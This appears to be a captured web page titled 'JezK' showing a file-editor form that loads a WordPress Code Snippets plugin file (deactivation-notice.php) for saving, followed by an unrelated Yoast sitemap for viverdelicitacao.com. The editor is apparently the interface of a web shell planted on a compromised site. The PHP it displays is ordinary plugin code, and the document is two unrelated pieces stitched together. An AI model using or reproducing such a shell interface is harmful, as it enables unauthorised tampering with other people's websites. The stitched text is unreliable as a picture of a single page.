
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: deactivation-notice.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * File loaded when the plugin cannot be activated.
 *
 * All code in this file should be compatible with PHP 5.2 or later.
 *
 * @package      Code_Snippets
 *
 * @noinspection PhpNestedDirNameCallsCanBeReplacedWithLevelParameterInspection
 *
 * phpcs:disable Modernize.FunctionCalls.Dirname.FileConstant
 */

if ( ! defined( &#039;ABSPATH&#039; ) || function_exists( &#039;code_snippets_deactivation_notice&#039; ) ) {
	return;
}

/**
 * Deactivate the plugin and display a notice informing the user that this has happened.
 *
 * @return void
 *
 * @since 3.3.0
 */
function code_snippets_deactivation_notice() {
	$plugins = array();
	$required_php_version = &#039;7.4&#039;;

	if ( version_compare( phpversion(), $required_php_version, &#039;&lt;&#039; ) ) {
		echo &#039;&lt;div class=&quot;error fade&quot;&gt;&lt;p&gt;&lt;strong&gt;&#039;;
		// translators: %s: required PHP version number.
		echo esc_html( sprintf( __( &#039;Code Snippets requires PHP %s or later.&#039;, &#039;code-snippets&#039; ), $required_php_version ) );
		echo &#039;&lt;/strong&gt;&lt;br&gt;&#039;;

		$update_url = function_exists( &#039;wp_get_default_update_php_url&#039; ) ?
			wp_get_default_update_php_url() :
			&#039;https://wordpress.org/support/update-php/&#039;;

		// translators: %s: Update PHP URL.
		$text = __( &#039;Please &lt;a href=&quot;%s&quot;&gt;upgrade your server to the latest version of PHP&lt;/a&gt; to continue using Code Snippets.&#039;, &#039;code-snippets&#039; );

		echo wp_kses( sprintf( $text, $update_url ), array( &#039;a&#039; =&gt; array( &#039;href&#039; =&gt; array() ) ) );
		echo &#039;&lt;/p&gt;&lt;/div&gt;&#039;;

		$plugins[] = plugin_basename( dirname( dirname( __FILE__ ) ) . &#039;/code-snippets.php&#039; );
	}

	if ( defined( &#039;CODE_SNIPPETS_FILE&#039; ) ) {
		echo &#039;&lt;div class=&quot;error fade&quot;&gt;&lt;p&gt;&#039;;
		esc_html_e( &#039;Another version of Code Snippets appears to be installed. Deactivating this version.&#039;, &#039;code-snippets&#039; );
		echo &#039;&lt;/p&gt;&lt;/div&gt;&#039;;

		$plugins[] = &#039;code-snippets/code-snippets.php&#039;;
	}

	if ( $plugins ) {
		require_once ABSPATH . &#039;wp-admin/includes/plugin.php&#039;;
		deactivate_plugins( array_unique( $plugins ) );
	}
}

add_action( &#039;admin_notices&#039;, &#039;code_snippets_deactivation_notice&#039; );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//viverdelicitacao.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://viverdelicitacao.com/page-sitemap.xml</loc>
		<lastmod>2025-08-22T16:18:12+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->